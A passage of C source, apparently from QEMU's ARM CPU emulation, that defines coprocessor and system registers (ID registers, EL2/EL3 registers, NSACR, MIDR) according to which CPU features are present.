.crm = 9, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write }, REGINFO_SENTINEL }; /* * ACTLR2 and HACTLR2 map to ACTLR_EL1[63:32] and * ACTLR_EL2[63:32]. They exist only if the ID_MMFR4.AC2 field * is non-zero, which is never for ARMv7, optionally in ARMv8 * and mandatorily for ARMv8.2 and up. * ACTLR2 is banked for S and NS if EL3 is AArch32. Since QEMU's * implementation is RAZ/WI we can ignore this detail, as we * do for ACTLR. */ static const ARMCPRegInfo actlr2_hactlr2_reginfo[] = { { .name = "ACTLR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 3, .access = PL1_RW, .accessfn = access_tacr, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HACTLR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; void register_cp_regs_for_features(ARMCPU *cpu) { /* Register all the coprocessor registers based on feature bits */ CPUARMState *env = &cpu->env; if (arm_feature(env, ARM_FEATURE_M)) { /* M profile has no coprocessor registers */ return; } define_arm_cp_regs(cpu, cp_reginfo); if (!arm_feature(env, ARM_FEATURE_V8)) { /* Must go early as it is full of wildcards that may be * overridden by later definitions. */ define_arm_cp_regs(cpu, not_v8_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V6)) { /* The ID registers all have impdef reset values */ ARMCPRegInfo v6_idregs[] = { { .name = "ID_PFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->id_pfr0 }, /* ID_PFR1 is not a plain ARM_CP_CONST because we don't know * the value of the GIC field until after we define these regs. */ { .name = "ID_PFR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 1, .access = PL1_R, .type = ARM_CP_NO_RAW, .accessfn = access_aa32_tid3, .readfn = id_pfr1_read, .writefn = arm_cp_write_ignore }, { .name = "ID_DFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_dfr0 }, { .name = "ID_AFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->id_afr0 }, { .name = "ID_MMFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr0 }, { .name = "ID_MMFR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr1 }, { .name = "ID_MMFR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr2 }, { .name = "ID_MMFR3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr3 }, { .name = "ID_ISAR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar0 }, { .name = "ID_ISAR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar1 }, { .name = "ID_ISAR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar2 }, { .name = "ID_ISAR3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar3 }, { .name = "ID_ISAR4", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar4 }, { .name = "ID_ISAR5", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar5 }, { .name = "ID_MMFR4", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr4 }, { .name = "ID_ISAR6", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar6 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, v6_idregs); define_arm_cp_regs(cpu, v6_cp_reginfo); } else { define_arm_cp_regs(cpu, not_v6_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V6K)) { define_arm_cp_regs(cpu, v6k_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7MP) && !arm_feature(env, ARM_FEATURE_PMSA)) { define_arm_cp_regs(cpu, v7mp_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7VE)) { define_arm_cp_regs(cpu, pmovsset_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7)) { ARMCPRegInfo clidr = { .name = "CLIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid2, .resetvalue = cpu->clidr }; define_one_arm_cp_reg(cpu, &clidr); define_arm_cp_regs(cpu, v7_cp_reginfo); define_debug_regs(cpu); define_pmu_regs(cpu); } else { define_arm_cp_regs(cpu, not_v7_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V8)) { /* AArch64 ID registers, which all have impdef reset values. * Note that within the ID register ranges the unused slots * must all RAZ, not UNDEF; future architecture versions may * define new registers here. */ ARMCPRegInfo v8_idregs[] = { /* * ID_AA64PFR0_EL1 is not a plain ARM_CP_CONST in system * emulation because we don't know the right value for the * GIC field until after we define these regs. */ { .name = "ID_AA64PFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 0, .access = PL1_R, .type = ARM_CP_NO_RAW, .accessfn = access_aa64_tid3, .readfn = id_aa64pfr0_read, .writefn = arm_cp_write_ignore }, { .name = "ID_AA64PFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64pfr1}, { .name = "ID_AA64PFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ZFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, /* At present, only SVEver == 0 is defined anyway. */ .resetvalue = 0 }, { .name = "ID_AA64PFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64DFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64dfr0 }, { .name = "ID_AA64DFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64dfr1 }, { .name = "ID_AA64DFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64DFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64AFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->id_aa64afr0 }, { .name = "ID_AA64AFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->id_aa64afr1 }, { .name = "ID_AA64AFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64AFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64isar0 }, { .name = "ID_AA64ISAR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64isar1 }, { .name = "ID_AA64ISAR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr0 }, { .name = "ID_AA64MMFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr1 }, { .name = "ID_AA64MMFR2_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr2 }, { .name = "ID_AA64MMFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr0 }, { .name = "MVFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr1 }, { .name = "MVFR2_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr2 }, { .name = "MVFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "PMCEID0", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 12, .opc2 = 6, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid0, 0, 32) }, { .name = "PMCEID0_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 6, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = cpu->pmceid0 }, { .name = "PMCEID1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 12, .opc2 = 7, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid1, 0, 32) }, { .name = "PMCEID1_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 7, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = cpu->pmceid1 }, REGINFO_SENTINEL }; /* RVBAR_EL1 is only implemented if EL1 is the highest EL */ if (!arm_feature(env, ARM_FEATURE_EL3) && !arm_feature(env, ARM_FEATURE_EL2)) { ARMCPRegInfo rvbar = { .name = "RVBAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL1_R, .resetvalue = cpu->rvbar }; define_one_arm_cp_reg(cpu, &rvbar); } define_arm_cp_regs(cpu, v8_idregs); define_arm_cp_regs(cpu, v8_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_EL2)) { uint64_t vmpidr_def = mpidr_read_val(env); ARMCPRegInfo vpidr_regs[] = { { .name = "VPIDR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .accessfn = access_el3_aa32ns, .resetvalue = cpu->midr, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.vpidr_el2) }, { .name = "VPIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.vpidr_el2) }, { .name = "VMPIDR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .accessfn = access_el3_aa32ns, .resetvalue = vmpidr_def, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.vmpidr_el2) }, { .name = "VMPIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .resetvalue = vmpidr_def, .fieldoffset = offsetof(CPUARMState, cp15.vmpidr_el2) }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vpidr_regs); define_arm_cp_regs(cpu, el2_cp_reginfo); if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, el2_v8_cp_reginfo); } /* RVBAR_EL2 is only implemented if EL2 is the highest EL */ if (!arm_feature(env, ARM_FEATURE_EL3)) { ARMCPRegInfo rvbar = { .name = "RVBAR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL2_R, .resetvalue = cpu->rvbar }; define_one_arm_cp_reg(cpu, &rvbar); } } else { /* If EL2 is missing but higher ELs are enabled, we need to * register the no_el2 reginfos. */ if (arm_feature(env, ARM_FEATURE_EL3)) { /* When EL3 exists but not EL2, VPIDR and VMPIDR take the value * of MIDR_EL1 and MPIDR_EL1. */ ARMCPRegInfo vpidr_regs[] = { { .name = "VPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.vpidr_el2) }, { .name = "VMPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_NO_RAW, .writefn = arm_cp_write_ignore, .readfn = mpidr_read }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vpidr_regs); define_arm_cp_regs(cpu, el3_no_el2_cp_reginfo); if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, el3_no_el2_v8_cp_reginfo); } } } if (arm_feature(env, ARM_FEATURE_EL3)) { define_arm_cp_regs(cpu, el3_cp_reginfo); ARMCPRegInfo el3_regs[] = { { .name = "RVBAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL3_R, .resetvalue = cpu->rvbar }, { .name = "SCTLR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 0, .opc2 = 0, .access = PL3_RW, .raw_writefn = raw_write, .writefn = sctlr_write, .fieldoffset = offsetof(CPUARMState, cp15.sctlr_el[3]), .resetvalue = cpu->reset_sctlr }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, el3_regs); } /* The behaviour of NSACR is sufficiently various that we don't * try to describe it in a single reginfo: * if EL3 is 64 bit, then trap to EL3 from S EL1, * reads as constant 0xc00 from NS EL1 and NS EL2 * if EL3 is 32 bit, then RW at EL3, RO at NS EL1 and NS EL2 * if v7 without EL3, register doesn't exist * if v8 without EL3, reads as constant 0xc00 from NS EL1 and NS EL2 */ if (arm_feature(env, ARM_FEATURE_EL3)) { if (arm_feature(env, ARM_FEATURE_AARCH64)) { ARMCPRegInfo nsacr = { .name = "NSACR", .type = ARM_CP_CONST, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL1_RW, .accessfn = nsacr_access, .resetvalue = 0xc00 }; define_one_arm_cp_reg(cpu, &nsacr); } else { ARMCPRegInfo nsacr = { .name = "NSACR", .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL3_RW | PL1_R, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.nsacr) }; define_one_arm_cp_reg(cpu, &nsacr); } } else { if (arm_feature(env, ARM_FEATURE_V8)) { ARMCPRegInfo nsacr = { .name = "NSACR", .type = ARM_CP_CONST, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL1_R, .resetvalue = 0xc00 }; define_one_arm_cp_reg(cpu, &nsacr); } } if (arm_feature(env, ARM_FEATURE_PMSA)) { if (arm_feature(env, ARM_FEATURE_V6)) { /* PMSAv6 not implemented */ assert(arm_feature(env, ARM_FEATURE_V7)); define_arm_cp_regs(cpu, vmsa_pmsa_cp_reginfo); define_arm_cp_regs(cpu, pmsav7_cp_reginfo); } else { define_arm_cp_regs(cpu, pmsav5_cp_reginfo); } } else { define_arm_cp_regs(cpu, vmsa_pmsa_cp_reginfo); define_arm_cp_regs(cpu, vmsa_cp_reginfo); /* TTCBR2 is introduced with ARMv8.2-AA32HPD. */ if (cpu_isar_feature(aa32_hpd, cpu)) { define_one_arm_cp_reg(cpu, &ttbcr2_reginfo); } } if (arm_feature(env, ARM_FEATURE_THUMB2EE)) { define_arm_cp_regs(cpu, t2ee_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { define_arm_cp_regs(cpu, generic_timer_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_VAPA)) { define_arm_cp_regs(cpu, vapa_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_TEST_CLEAN)) { define_arm_cp_regs(cpu, cache_test_clean_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_DIRTY_REG)) { define_arm_cp_regs(cpu, cache_dirty_status_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_BLOCK_OPS)) { define_arm_cp_regs(cpu, cache_block_ops_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_OMAPCP)) { define_arm_cp_regs(cpu, omap_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_STRONGARM)) { define_arm_cp_regs(cpu, strongarm_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_XSCALE)) { define_arm_cp_regs(cpu, xscale_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_DUMMY_C15_REGS)) { define_arm_cp_regs(cpu, dummy_c15_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_LPAE)) { define_arm_cp_regs(cpu, lpae_cp_reginfo); } if (cpu_isar_feature(aa32_jazelle, cpu)) { define_arm_cp_regs(cpu, jazelle_regs); } /* Slightly awkwardly, the OMAP and StrongARM cores need all of * cp15 crn=0 to be writes-ignored, whereas for other cores they should * be read-only (ie write causes UNDEF exception). */ { ARMCPRegInfo id_pre_v8_midr_cp_reginfo[] = { /* Pre-v8 MIDR space. * Note that the MIDR isn't a simple constant register because * of the TI925 behaviour where writes to another register can * cause the MIDR value to change. * * Unimplemented registers in the c15 0 0 0 space default to * MIDR. Define MIDR first as this entire space, then CTR, TCMTR * and friends override accordingly. */ { .name = "MIDR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .resetvalue = cpu->midr, .writefn = arm_cp_write_ignore, .raw_writefn = raw_write, .readfn = midr_read, .fieldoffset = offsetof(CPUARMState, cp15.c0_cpuid), .type = ARM_CP_OVERRIDE }, /* crn = 0 op1 = 0 crm = 3..7 : currently unassigned; we RAZ. */ { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 3, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 4, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 5, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 6, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 7, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; ARMCPRegInfo id_v8_midr_cp_reginfo[] = { { .name = "MIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 0, .opc2 = 0, .access = PL1_R, .type = ARM_CP_NO_RAW, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.c0_cpuid), .readfn = midr_read }, /* crn = 0 op1 = 0 crm = 0 op2 = 4,7 : AArch32 aliases of MIDR */ { .name = "MIDR", .type = 